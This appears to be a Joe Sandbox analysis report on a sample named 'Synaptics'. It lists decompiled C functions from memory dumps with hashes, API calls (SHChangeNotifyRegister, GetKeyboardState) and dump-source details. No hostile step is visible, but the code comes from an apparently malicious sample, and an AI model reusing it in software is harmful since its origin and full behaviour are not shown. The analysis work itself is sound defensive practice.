                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                                                                                            • Opcode ID: 09bf80b8dcbbe8d54fbffc4de11ae3cf3638ee828764dcdda864e46b8a351136
                                                                                                                                                                                                                            • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09bf80b8dcbbe8d54fbffc4de11ae3cf3638ee828764dcdda864e46b8a351136
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045E750 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0045E750(intOrPtr __eax, void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t81;
				intOrPtr _t118;
				intOrPtr _t131;
				signed int _t134;
				intOrPtr _t141;
				void* _t151;
				void* _t152;
				signed int _t155;
				void* _t157;
				void* _t159;
				intOrPtr _t160;

				_t81 = __eax;
				_t157 = _t159;
				_t160 = _t159 + 0xfffffff8;
				_v8 = __eax;
				if( *0x49c080 == 0) {
					L48:
					return _t81;
				} else {
					_t81 = _v8;
					if( *((intOrPtr*)(_t81 + 0xd6)) != 0) {
						goto L48;
					} else {
						_t134 = 0;
						if( *((short*)(_v8 + 0x34)) != 0) {
							_t134 = 0x8000000;
						}
						if( *((short*)(_v8 + 0x3c)) != 0) {
							_t134 = _t134 | 0x00000800;
						}
						if( *((short*)(_v8 + 0x44)) != 0) {
							_t134 = _t134 | 0x00000002;
						}
						if( *((short*)(_v8 + 0x4c)) != 0) {
							_t134 = _t134 | 0x00000004;
						}
						if( *((short*)(_v8 + 0x54)) != 0) {
							_t134 = _t134 | 0x00000100;
						}
						if( *((short*)(_v8 + 0x5c)) != 0) {
							_t134 = _t134 | 0x00010000;
						}
						if( *((short*)(_v8 + 0x64)) != 0) {
							_t134 = _t134 | 0x00000080;
						}
						if( *((short*)(_v8 + 0x6c)) != 0) {
							_t134 = _t134 | 0x00040000;
						}
						if( *((short*)(_v8 + 0x74)) != 0) {
							_t134 = _t134 | 0x00000020;
						}
						if( *((short*)(_v8 + 0x7c)) != 0) {
							_t134 = _t134 | 0x00000040;
						}
						if( *((short*)(_v8 + 0x84)) != 0) {
							_t134 = _t134 | 0x00000008;
						}
						if( *((short*)(_v8 + 0x8c)) != 0) {
							_t134 = _t134 | 0x00000200;
						}
						if( *((short*)(_v8 + 0x94)) != 0) {
							_t134 = _t134 | 0x00000400;
						}
						if( *((short*)(_v8 + 0x9c)) != 0) {
							_t134 = _t134 | 0x00020000;
						}
						if( *((short*)(_v8 + 0xa4)) != 0) {
							_t134 = _t134 | 0x00000001;
						}
						if( *((short*)(_v8 + 0xac)) != 0) {
							_t134 = _t134 | 0x00000010;
						}
						if( *((short*)(_v8 + 0xb4)) != 0) {
							_t134 = _t134 | 0x00004000;
						}
						if( *((short*)(_v8 + 0xbc)) != 0) {
							_t134 = _t134 | 0x00001000;
						}
						if( *((short*)(_v8 + 0xc4)) != 0) {
							_t134 = _t134 | 0x00008000;
						}
						_t81 = _v8;
						if( *((short*)(_t81 + 0xcc)) != 0) {
							_t134 = _t134 | 0x00002000;
						}
						if(_t134 == 0) {
							goto L48;
						} else {
							_t81 =  *((intOrPtr*)(_v8 + 0xea));
							if( *((intOrPtr*)(_t81 + 8)) <= 0) {
								goto L48;
							} else {
								_v12 = E0040275C( *( *((intOrPtr*)(_v8 + 0xea)) + 8) << 3);
								_push(_t157);
								_push(0x45e9b4);
								_push( *[fs:eax]);
								 *[fs:eax] = _t160;
								_t151 =  *( *((intOrPtr*)(_v8 + 0xea)) + 8) - 1;
								if(_t151 >= 0) {
									_t152 = _t151 + 1;
									_t155 = 0;
									do {
										 *((intOrPtr*)(_v12 + _t155 * 8)) = E0045D3C8( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155) + 4)), _t155, 0);
										_t131 = E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155);
										asm("cmc");
										asm("sbb eax, eax");
										 *((intOrPtr*)(_v12 + 4 + _t155 * 8)) = _t131;
										_t155 = _t155 + 1;
										_t152 = _t152 - 1;
									} while (_t152 != 0);
								}
								_t118 =  *0x49c080( *((intOrPtr*)(_v8 + 0xda)), 3, _t134,  *((intOrPtr*)(_v8 + 0xd2)),  *( *((intOrPtr*)(_v8 + 0xea)) + 8), _v12); // executed
								 *((intOrPtr*)(_v8 + 0xd6)) = _t118;
								_pop(_t141);
								 *[fs:eax] = _t141;
								_push(0x45e9bb);
								return E0040277C(_v12);
							}
						}
					}
				}
			}
















                                                                                                                                                                                                                            0x0045e750
                                                                                                                                                                                                                            0x0045e751
                                                                                                                                                                                                                            0x0045e753
                                                                                                                                                                                                                            0x0045e759
                                                                                                                                                                                                                            0x0045e763
                                                                                                                                                                                                                            0x0045e9bb
                                                                                                                                                                                                                            0x0045e9c1
                                                                                                                                                                                                                            0x0045e769
                                                                                                                                                                                                                            0x0045e769
                                                                                                                                                                                                                            0x0045e773
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045e779
                                                                                                                                                                                                                            0x0045e779
                                                                                                                                                                                                                            0x0045e783
                                                                                                                                                                                                                            0x0045e785
                                                                                                                                                                                                                            0x0045e785
                                                                                                                                                                                                                            0x0045e793
                                                                                                                                                                                                                            0x0045e795
                                                                                                                                                                                                                            0x0045e795
                                                                                                                                                                                                                            0x0045e7a3
                                                                                                                                                                                                                            0x0045e7a5
                                                                                                                                                                                                                            0x0045e7a5
                                                                                                                                                                                                                            0x0045e7b0
                                                                                                                                                                                                                            0x0045e7b2
                                                                                                                                                                                                                            0x0045e7b2
                                                                                                                                                                                                                            0x0045e7bd
                                                                                                                                                                                                                            0x0045e7bf
                                                                                                                                                                                                                            0x0045e7bf
                                                                                                                                                                                                                            0x0045e7cd
                                                                                                                                                                                                                            0x0045e7cf
                                                                                                                                                                                                                            0x0045e7cf
                                                                                                                                                                                                                            0x0045e7dd
                                                                                                                                                                                                                            0x0045e7df
                                                                                                                                                                                                                            0x0045e7df
                                                                                                                                                                                                                            0x0045e7ed
                                                                                                                                                                                                                            0x0045e7ef
                                                                                                                                                                                                                            0x0045e7ef
                                                                                                                                                                                                                            0x0045e7fd
                                                                                                                                                                                                                            0x0045e7ff
                                                                                                                                                                                                                            0x0045e7ff
                                                                                                                                                                                                                            0x0045e80a
                                                                                                                                                                                                                            0x0045e80c
                                                                                                                                                                                                                            0x0045e80c
                                                                                                                                                                                                                            0x0045e81a
                                                                                                                                                                                                                            0x0045e81c
                                                                                                                                                                                                                            0x0045e81c
                                                                                                                                                                                                                            0x0045e82a
                                                                                                                                                                                                                            0x0045e82c
                                                                                                                                                                                                                            0x0045e82c
                                                                                                                                                                                                                            0x0045e83d
                                                                                                                                                                                                                            0x0045e83f
                                                                                                                                                                                                                            0x0045e83f
                                                                                                                                                                                                                            0x0045e850
                                                                                                                                                                                                                            0x0045e852
                                                                                                                                                                                                                            0x0045e852
                                                                                                                                                                                                                            0x0045e863
                                                                                                                                                                                                                            0x0045e865
                                                                                                                                                                                                                            0x0045e865
                                                                                                                                                                                                                            0x0045e873
                                                                                                                                                                                                                            0x0045e875
                                                                                                                                                                                                                            0x0045e875
                                                                                                                                                                                                                            0x0045e883
                                                                                                                                                                                                                            0x0045e885
                                                                                                                                                                                                                            0x0045e885
                                                                                                                                                                                                                            0x0045e896
                                                                                                                                                                                                                            0x0045e898
                                                                                                                                                                                                                            0x0045e898
                                                                                                                                                                                                                            0x0045e8a9
                                                                                                                                                                                                                            0x0045e8ab
                                                                                                                                                                                                                            0x0045e8ab
                                                                                                                                                                                                                            0x0045e8b1
                                                                                                                                                                                                                            0x0045e8bc
                                                                                                                                                                                                                            0x0045e8be
                                                                                                                                                                                                                            0x0045e8be
                                                                                                                                                                                                                            0x0045e8c6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045e8cc
                                                                                                                                                                                                                            0x0045e8cf
                                                                                                                                                                                                                            0x0045e8d9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045e8df
                                                                                                                                                                                                                            0x0045e8f3
                                                                                                                                                                                                                            0x0045e8f8
                                                                                                                                                                                                                            0x0045e8f9
                                                                                                                                                                                                                            0x0045e8fe
                                                                                                                                                                                                                            0x0045e901
                                                                                                                                                                                                                            0x0045e910
                                                                                                                                                                                                                            0x0045e913
                                                                                                                                                                                                                            0x0045e915
                                                                                                                                                                                                                            0x0045e916
                                                                                                                                                                                                                            0x0045e918
                                                                                                                                                                                                                            0x0045e933
                                                                                                                                                                                                                            0x0045e941
                                                                                                                                                                                                                            0x0045e94a
                                                                                                                                                                                                                            0x0045e94b
                                                                                                                                                                                                                            0x0045e950
                                                                                                                                                                                                                            0x0045e954
                                                                                                                                                                                                                            0x0045e955
                                                                                                                                                                                                                            0x0045e955
                                                                                                                                                                                                                            0x0045e918
                                                                                                                                                                                                                            0x0045e980
                                                                                                                                                                                                                            0x0045e989
                                                                                                                                                                                                                            0x0045e991
                                                                                                                                                                                                                            0x0045e994
                                                                                                                                                                                                                            0x0045e997
                                                                                                                                                                                                                            0x0045e9b3
                                                                                                                                                                                                                            0x0045e9b3
                                                                                                                                                                                                                            0x0045e8d9
                                                                                                                                                                                                                            0x0045e8c6
                                                                                                                                                                                                                            0x0045e773

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHChangeNotifyRegister.SHELL32(?,00000003,00000000,?,00000000,00000000), ref: 0045E980
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ChangeNotifyRegister
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2496720357-0
                                                                                                                                                                                                                            • Opcode ID: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                                                            • Instruction ID: f0d6c2aca2f313063b58c8eb8d36d93d0d95f6167d0470ee0e7879a3adb86f1a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2371D134A00204DFE715DB99C188F9977F6EB04305F5580E5E904AB3E2D3B9AF88DB94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x21e12f4
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x21e12f4
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x21e12f4
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                                                                                                                                                                                            0x0043c208
                                                                                                                                                                                                                            0x0043c20a
                                                                                                                                                                                                                            0x0043c210
                                                                                                                                                                                                                            0x0043c248
                                                                                                                                                                                                                            0x0043c248
                                                                                                                                                                                                                            0x0043c24f
                                                                                                                                                                                                                            0x0043c288
                                                                                                                                                                                                                            0x0043c28a
                                                                                                                                                                                                                            0x0043c28f
                                                                                                                                                                                                                            0x0043c367
                                                                                                                                                                                                                            0x0043c367
                                                                                                                                                                                                                            0x0043c36c
                                                                                                                                                                                                                            0x0043c379
                                                                                                                                                                                                                            0x0043c379
                                                                                                                                                                                                                            0x0043c37e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c384
                                                                                                                                                                                                                            0x0043c295
                                                                                                                                                                                                                            0x0043c29a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2a0
                                                                                                                                                                                                                            0x0043c2a4
                                                                                                                                                                                                                            0x0043c2ba
                                                                                                                                                                                                                            0x0043c2bc
                                                                                                                                                                                                                            0x0043c2bc
                                                                                                                                                                                                                            0x0043c2c1
                                                                                                                                                                                                                            0x0043c2ce
                                                                                                                                                                                                                            0x0043c2d0
                                                                                                                                                                                                                            0x0043c2d9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2d9
                                                                                                                                                                                                                            0x0043c2c3
                                                                                                                                                                                                                            0x0043c2c3
                                                                                                                                                                                                                            0x0043c2c4
                                                                                                                                                                                                                            0x0043c2e3
                                                                                                                                                                                                                            0x0043c2e3
                                                                                                                                                                                                                            0x0043c2e7
                                                                                                                                                                                                                            0x0043c2f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2f9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2ef
                                                                                                                                                                                                                            0x0043c2c6
                                                                                                                                                                                                                            0x0043c2c6
                                                                                                                                                                                                                            0x0043c2c7
                                                                                                                                                                                                                            0x0043c300
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c300
                                                                                                                                                                                                                            0x0043c2c9
                                                                                                                                                                                                                            0x0043c2ca
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c307
                                                                                                                                                                                                                            0x0043c30c
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c317
                                                                                                                                                                                                                            0x0043c31b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c31f
                                                                                                                                                                                                                            0x0043c325
                                                                                                                                                                                                                            0x0043c325
                                                                                                                                                                                                                            0x0043c328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c331
                                                                                                                                                                                                                            0x0043c338
                                                                                                                                                                                                                            0x0043c346
                                                                                                                                                                                                                            0x0043c34d
                                                                                                                                                                                                                            0x0043c354
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c360
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2ab
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2b0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b2
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x0043c25f
                                                                                                                                                                                                                            0x0043c266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c275
                                                                                                                                                                                                                            0x0043c27d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c283
                                                                                                                                                                                                                            0x0043c212
                                                                                                                                                                                                                            0x0043c219
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c22e
                                                                                                                                                                                                                            0x0043c23d
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x0043c38d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1724228437-0
                                                                                                                                                                                                                            • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00410A04 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E00410A04(intOrPtr _a4, signed int* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				char* _v12;
				char _v28;
				void* __ebp;
				signed int _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t54;
				signed int* _t56;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t71 = _t73;
				_t74 = _t73 + 0xffffffe8;
				_t56 = _a8;
				if( *_t56 != 0x400c) {
					__eflags = _a4;
					if(_a4 != 0) {
						_push( &_v28);
						L0040F318();
						_v12 =  &_v28;
					} else {
						_v12 = 0;
					}
					_push(_t71);
					_push(0x410af8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t74;
					_t68 =  *_t56;
					_t27 =  *_t56 & 0x0000ffff;
					__eflags = _t27 - 0x101;
					if(__eflags > 0) {
						_t28 = _t27 - 0x4009;
						__eflags = _t28;
						if(_t28 == 0) {
							goto L12;
						} else {
							__eflags = _t28 != 4;
							if(_t28 != 4) {
								goto L14;
							} else {
								goto L12;
							}
						}
					} else {
						if(__eflags == 0) {
							L12:
							__eflags =  *0x49e810;
							if( *0x49e810 != 0) {
								 *0x49e810(_v12, _t56, _a12,  &_a16); // executed
							}
						} else {
							_t47 = _t27 - 9;
							__eflags = _t47;
							if(_t47 == 0) {
								goto L12;
							} else {
								__eflags = _t47 == 4;
								if(_t47 == 4) {
									goto L12;
								} else {
									L14:
									_t41 = E0041713C(_t68,  &_v8);
									__eflags = _t41;
									if(_t41 == 0) {
										E0041024C(_t59);
									} else {
										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
									}
								}
							}
						}
					}
					__eflags = 0;
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00410AFF);
					__eflags = _v12;
					if(_v12 != 0) {
						E00410E14(_a4, _v12);
						return E004109E8( &_v28);
					}
					return 0;
				} else {
					_t54 = E00410A04(_a4, _t56[2], _a12, _a16);
					return _t54;
				}
			}


















                                                                                                                                                                                                                            0x00410a05
                                                                                                                                                                                                                            0x00410a07
                                                                                                                                                                                                                            0x00410a0c
                                                                                                                                                                                                                            0x00410a14
                                                                                                                                                                                                                            0x00410a33
                                                                                                                                                                                                                            0x00410a37
                                                                                                                                                                                                                            0x00410a43
                                                                                                                                                                                                                            0x00410a44
                                                                                                                                                                                                                            0x00410a4c
                                                                                                                                                                                                                            0x00410a39
                                                                                                                                                                                                                            0x00410a3b
                                                                                                                                                                                                                            0x00410a3b
                                                                                                                                                                                                                            0x00410a51
                                                                                                                                                                                                                            0x00410a52
                                                                                                                                                                                                                            0x00410a57
                                                                                                                                                                                                                            0x00410a5a
                                                                                                                                                                                                                            0x00410a5d
                                                                                                                                                                                                                            0x00410a60
                                                                                                                                                                                                                            0x00410a63
                                                                                                                                                                                                                            0x00410a68
                                                                                                                                                                                                                            0x00410a78
                                                                                                                                                                                                                            0x00410a78
                                                                                                                                                                                                                            0x00410a7d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410a7f
                                                                                                                                                                                                                            0x00410a7f
                                                                                                                                                                                                                            0x00410a82
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410a82
                                                                                                                                                                                                                            0x00410a6a
                                                                                                                                                                                                                            0x00410a6a
                                                                                                                                                                                                                            0x00410a84
                                                                                                                                                                                                                            0x00410a84
                                                                                                                                                                                                                            0x00410a8b
                                                                                                                                                                                                                            0x00410a9a
                                                                                                                                                                                                                            0x00410aa0
                                                                                                                                                                                                                            0x00410a6c
                                                                                                                                                                                                                            0x00410a6c
                                                                                                                                                                                                                            0x00410a6c
                                                                                                                                                                                                                            0x00410a6f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410a71
                                                                                                                                                                                                                            0x00410a71
                                                                                                                                                                                                                            0x00410a74
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410a76
                                                                                                                                                                                                                            0x00410aa5
                                                                                                                                                                                                                            0x00410aaa
                                                                                                                                                                                                                            0x00410aaf
                                                                                                                                                                                                                            0x00410ab1
                                                                                                                                                                                                                            0x00410aca
                                                                                                                                                                                                                            0x00410ab3
                                                                                                                                                                                                                            0x00410ac5
                                                                                                                                                                                                                            0x00410ac5
                                                                                                                                                                                                                            0x00410ab1
                                                                                                                                                                                                                            0x00410a74
                                                                                                                                                                                                                            0x00410a6f
                                                                                                                                                                                                                            0x00410a6a
                                                                                                                                                                                                                            0x00410acf
                                                                                                                                                                                                                            0x00410ad1
                                                                                                                                                                                                                            0x00410ad4
                                                                                                                                                                                                                            0x00410ad7
                                                                                                                                                                                                                            0x00410adc
                                                                                                                                                                                                                            0x00410ae0
                                                                                                                                                                                                                            0x00410aea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410af2
                                                                                                                                                                                                                            0x00410af7
                                                                                                                                                                                                                            0x00410a16
                                                                                                                                                                                                                            0x00410a26
                                                                                                                                                                                                                            0x00410b04
                                                                                                                                                                                                                            0x00410b04

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                                                                                            • Opcode ID: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                                                            • Instruction ID: 827efc6faae8abaedf60253a3c6b5d70b674294039054989f6423f3ec82ecb16
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB314A71A04308AFDB20DFA8C985AEE77A8EF18390F544467F904D3241D7B89DD0C7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473E4C Relevance: 1.6, APIs: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 63%
